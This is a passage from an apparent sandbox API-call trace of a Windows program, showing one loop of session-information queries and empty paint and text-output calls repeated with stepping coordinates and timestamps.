(hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.519] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.520] WTSFreeMemory (pMemory=0x0) [0037.520] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.520] TextOutW (hdc=0x0, x=2633, y=1675, lpString="", c=0) returned 1 [0037.520] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.520] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.520] WTSFreeMemory (pMemory=0x0) [0037.520] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.520] TextOutW (hdc=0x0, x=2643, y=1700, lpString="", c=0) returned 1 [0037.520] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.520] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.520] WTSFreeMemory (pMemory=0x0) [0037.521] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.521] TextOutW (hdc=0x0, x=2653, y=1725, lpString="", c=0) returned 1 [0037.521] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.521] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.521] WTSFreeMemory (pMemory=0x0) [0037.521] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.521] TextOutW (hdc=0x0, x=2663, y=1750, lpString="", c=0) returned 1 [0037.521] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.521] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.521] WTSFreeMemory (pMemory=0x0) [0037.522] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.522] TextOutW (hdc=0x0, x=2673, y=1775, lpString="", c=0) returned 1 [0037.522] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.522] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.522] WTSFreeMemory (pMemory=0x0) [0037.522] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.522] TextOutW (hdc=0x0, x=2683, y=1800, lpString="", c=0) returned 1 [0037.522] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.522] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.522] WTSFreeMemory (pMemory=0x0) [0037.522] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.522] TextOutW (hdc=0x0, x=2693, y=1825, lpString="", c=0) returned 1 [0037.522] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.522] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.523] WTSFreeMemory (pMemory=0x0) [0037.523] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.523] TextOutW (hdc=0x0, x=2703, y=1850, lpString="", c=0) returned 1 [0037.523] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.523] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.523] WTSFreeMemory (pMemory=0x0) [0037.523] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.523] TextOutW (hdc=0x0, x=2713, y=1875, lpString="", c=0) returned 1 [0037.523] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.523] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.524] WTSFreeMemory (pMemory=0x0) [0037.524] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.524] TextOutW (hdc=0x0, x=2723, y=1900, lpString="", c=0) returned 1 [0037.524] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.524] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.524] WTSFreeMemory (pMemory=0x0) [0037.524] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.524] TextOutW (hdc=0x0, x=2733, y=1925, lpString="", c=0) returned 1 [0037.524] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.524] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.524] WTSFreeMemory (pMemory=0x0) [0037.525] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.525] TextOutW (hdc=0x0, x=2743, y=1950, lpString="", c=0) returned 1 [0037.525] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.525] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.525] WTSFreeMemory (pMemory=0x0) [0037.525] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.525] TextOutW (hdc=0x0, x=2753, y=1975, lpString="", c=0) returned 1 [0037.525] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.525] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.525] WTSFreeMemory (pMemory=0x0) [0037.526] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.526] TextOutW (hdc=0x0, x=2763, y=2000, lpString="", c=0) returned 1 [0037.526] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.526] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.526] WTSFreeMemory (pMemory=0x0) [0037.526] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.526] TextOutW (hdc=0x0, x=2773, y=2025, lpString="", c=0) returned 1 [0037.526] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.526] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.526] WTSFreeMemory (pMemory=0x0) [0037.526] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.526] TextOutW (hdc=0x0, x=2783, y=2050, lpString="", c=0) returned 1 [0037.526] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.527] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.527] WTSFreeMemory (pMemory=0x0) [0037.527] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.527] TextOutW (hdc=0x0, x=2793, y=2075, lpString="", c=0) returned 1 [0037.527] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.527] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.527] WTSFreeMemory (pMemory=0x0) [0037.527] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.527] TextOutW (hdc=0x0, x=2803, y=2100, lpString="", c=0) returned 1 [0037.527] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.527] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.528] WTSFreeMemory (pMemory=0x0) [0037.528] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.528] TextOutW (hdc=0x0, x=2813, y=2125, lpString="", c=0) returned 1 [0037.528] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.528] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.528] WTSFreeMemory (pMemory=0x0) [0037.528] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.528] TextOutW (hdc=0x0, x=2823, y=2150, lpString="", c=0) returned 1 [0037.528] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.528] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.529] WTSFreeMemory (pMemory=0x0) [0037.529] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.529] TextOutW (hdc=0x0, x=2833, y=2175, lpString="", c=0) returned 1 [0037.529] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.529] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.529] WTSFreeMemory (pMemory=0x0) [0037.529] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.529] TextOutW (hdc=0x0, x=2843, y=2200, lpString="", c=0) returned 1 [0037.529] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.529] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.529] WTSFreeMemory (pMemory=0x0) [0037.530] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.530] TextOutW (hdc=0x0, x=2853, y=2225, lpString="", c=0) returned 1 [0037.530] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.530] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.530] WTSFreeMemory (pMemory=0x0) [0037.530] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.530] TextOutW (hdc=0x0, x=2863, y=2250, lpString="", c=0) returned 1 [0037.530] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.530] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.531] WTSFreeMemory (pMemory=0x0) [0037.531] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.531] TextOutW (hdc=0x0, x=2873, y=2275, lpString="", c=0) returned 1 [0037.531] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.531] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.531] WTSFreeMemory (pMemory=0x0) [0037.531] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.531] TextOutW (hdc=0x0, x=2883, y=2300, lpString="", c=0) returned 1 [0037.531] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.531] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.532] WTSFreeMemory (pMemory=0x0) [0037.532] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.532] TextOutW (hdc=0x0, x=2893, y=2325, lpString="", c=0) returned 1 [0037.532] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.532] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.532] WTSFreeMemory (pMemory=0x0) [0037.532] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.532] TextOutW (hdc=0x0, x=2903, y=2350, lpString="", c=0) returned 1 [0037.532] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.532] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.532] WTSFreeMemory (pMemory=0x0) [0037.533] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.533] TextOutW (hdc=0x0, x=2913, y=2375, lpString="", c=0) returned 1 [0037.533] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.533] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.533] WTSFreeMemory (pMemory=0x0) [0037.533] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.533] TextOutW (hdc=0x0, x=2923, y=2400, lpString="", c=0) returned 1 [0037.533] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.533] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.533] WTSFreeMemory (pMemory=0x0) [0037.534] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.534] TextOutW (hdc=0x0, x=2933, y=2425, lpString="", c=0) returned 1 [0037.534] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.534] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.534] WTSFreeMemory (pMemory=0x0) [0037.534] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.534] TextOutW (hdc=0x0, x=2943, y=2450, lpString="", c=0) returned 1 [0037.534] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.534] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.534] WTSFreeMemory (pMemory=0x0) [0037.535] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.535] TextOutW (hdc=0x0, x=2953, y=2475, lpString="", c=0) returned 1 [0037.535] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.535] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.535] WTSFreeMemory (pMemory=0x0) [0037.535] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.535] TextOutW (hdc=0x0, x=2963, y=2500, lpString="", c=0) returned 1 [0037.535] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.535] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.535] WTSFreeMemory (pMemory=0x0) [0037.536] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.536] TextOutW (hdc=0x0, x=2973, y=2525, lpString="", c=0) returned 1 [0037.536] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.536] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.536] WTSFreeMemory (pMemory=0x0) [0037.536] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.536] TextOutW (hdc=0x0, x=2983, y=2550, lpString="", c=0) returned 1 [0037.536] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.536] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.536] WTSFreeMemory (pMemory=0x0) [0037.536] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.536] TextOutW (hdc=0x0, x=2993, y=2575, lpString="", c=0) returned 1 [0037.536] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.537] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.537] WTSFreeMemory (pMemory=0x0) [0037.537] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.537] TextOutW (hdc=0x0, x=3003, y=2600, lpString="", c=0) returned 1 [0037.537] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.537] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.537] WTSFreeMemory (pMemory=0x0) [0037.537] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.537] TextOutW (hdc=0x0, x=3013, y=2625, lpString="", c=0) returned 1 [0037.537] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.537] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.538] WTSFreeMemory (pMemory=0x0) [0037.538] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.538] TextOutW (hdc=0x0, x=3023, y=2650, lpString="", c=0) returned 1 [0037.538] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.538] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.538] WTSFreeMemory (pMemory=0x0) [0037.538] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.538] TextOutW (hdc=0x0, x=3033, y=2675, lpString="", c=0) returned 1 [0037.538] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.538] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.539] WTSFreeMemory (pMemory=0x0) [0037.539] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.539] TextOutW (hdc=0x0, x=3043, y=2700, lpString="", c=0) returned 1 [0037.539] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.539] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.539] WTSFreeMemory (pMemory=0x0) [0037.539] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.539] TextOutW (hdc=0x0, x=3053, y=2725, lpString="", c=0) returned 1 [0037.539] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.539] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.539] WTSFreeMemory (pMemory=0x0) [0037.540] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.540] TextOutW (hdc=0x0, x=3063, y=2750, lpString="", c=0) returned 1 [0037.540] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.540] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.540] WTSFreeMemory (pMemory=0x0) [0037.540] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.540] TextOutW (hdc=0x0, x=3073, y=2775, lpString="", c=0) returned 1 [0037.540] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.540] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.540] WTSFreeMemory (pMemory=0x0) [0037.541] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.541] TextOutW (hdc=0x0, x=3083, y=2800, lpString="", c=0) returned 1 [0037.541] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.541] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.541] WTSFreeMemory (pMemory=0x0) [0037.541] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.541] TextOutW (hdc=0x0, x=3093, y=2825, lpString="", c=0) returned 1 [0037.541] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.541] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.541] WTSFreeMemory (pMemory=0x0) [0037.541] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.541] TextOutW (hdc=0x0, x=3103, y=2850, lpString="", c=0) returned 1 [0037.541] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.541] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.542] WTSFreeMemory (pMemory=0x0) [0037.542] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.542] TextOutW (hdc=0x0, x=3113, y=2875, lpString="", c=0) returned 1 [0037.542] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.542] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.542] WTSFreeMemory (pMemory=0x0) [0037.542] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.542] TextOutW (hdc=0x0, x=3123, y=2900, lpString="", c=0) returned 1 [0037.542] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.542] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.543] WTSFreeMemory (pMemory=0x0) [0037.543] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.543] TextOutW (hdc=0x0, x=3133, y=2925, lpString="", c=0) returned 1 [0037.543] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.543] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.543] 